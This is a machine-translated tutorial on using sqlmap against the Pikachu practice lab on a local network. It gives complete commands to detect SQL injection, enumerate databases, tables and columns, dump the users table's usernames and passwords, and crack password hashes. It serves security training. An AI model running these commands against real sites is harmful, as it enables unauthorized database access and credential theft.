当前位置：网站首页>Sqlmap tutorial (II) practical skills I

Sqlmap tutorial (II) practical skills I

2022-07-05 06:06:00 【A τθ】

One 、 Detection Injection

 testing URL GET Whether there is injection of parameters ：

-u  Tested url
"" Double quotes , Indicates that this is a string .
--dbms  Specify the data engine of the attack 
-v  Output information is registered as 1

sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1

 After typing sqlmap Will automatically inject , But there will be some prompts , You need to confirm at the terminal , If you use --batch  The default operation will be performed automatically , There is no need to determine the interactive information .
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 --batch

Insert picture description here

Two 、 Get sensitive information

 After confirming the existence of Injection , Then, get the information through the command of getting sensitive information 

--current-user  Users connected by users ;
--currnet-db  Current library ;
--dbs  Get all libraries ;
--is-dba  whether root jurisdiction ;
--passwords  Get the password of the database .
 Use this command  sqlmap When you find the ciphertext , Will prompt you whether to hash Crack , If you need to choose the right dictionary .

eg:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql --current-user --current-db --is-dba --passwords -v 1 --batch

Insert picture description here

3、 ... and 、 Get the table

 Get the current library , You can list tables according to the Library .

-D  Specify the library ;
--tables  List all the tables .

sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu --tables

Insert picture description here

Four 、 Get the fields of the table

 Get all the fields of a table .

-T  Specify a table ;
--columns  Get field .

sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --columns

Insert picture description here

5、 ... and 、 get data

--dump  Export all contents of data ;
--dump -C "username,password"  Get the contents of the field ;

 Get all field contents of the specified table ：
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --columns --dump

Insert picture description here

 Get the specified table 、 Specify field content .
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users -C "id,username,password" --dump

Insert picture description here

6、 ... and 、 Get the specified number

 Get the total number ：
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --count

Insert picture description here

 Get specified id Number of pieces ：
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --dump --start 2 --stop 3

Insert picture description here

7、 ... and 、 Delete cache file

 Parameters ：--flush-session
 If you don't want to use the previous cache of this target session file , You can use this parameter .  Will empty the previous session, Retest the goal .

原网站

版权声明
本文为[A τθ]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/186/202207050603189006.html